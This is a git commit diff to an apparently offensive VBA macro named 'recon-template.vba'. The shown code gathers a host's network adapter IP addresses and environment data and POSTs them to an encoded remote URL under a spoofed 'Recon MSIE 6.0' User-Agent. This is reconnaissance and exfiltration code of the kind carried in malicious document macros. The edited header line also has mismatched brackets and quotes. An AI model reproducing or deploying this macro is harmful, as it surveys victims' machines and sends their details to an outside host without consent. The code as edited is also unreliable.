Update recon-template.vba
parent
e92382800f
commit
30c5968f97
|
@ -18,7 +18,7 @@ Function env_query() As String
|
|||
|
||||
URL = decode("[URL]")
|
||||
env_query2.Open "POST", URL, False
|
||||
env_query2.setRequestHeader decode({["User-Agent", "Mozilla/4.0 (compatible; Recon MSIE 6.0; Windows NT 5.0)"]})
|
||||
env_query2.setRequestHeader "User-Agent", decode("{[Mozilla/4.0 (compatible; Recon MSIE 6.0; Windows NT 5.0)"]})
|
||||
env_query2.send(env_query1)
|
||||
End Function
|
||||
|
||||
|
@ -59,4 +59,4 @@ Function network_list() As String
|
|||
network_list4 = network_list4 & "," & network_list3.IPAddress & "=" & network_list3.Description
|
||||
Next
|
||||
network_list = network_list4
|
||||
End Function
|
||||
End Function
|
||||
|
|
Loading…
Reference in New Issue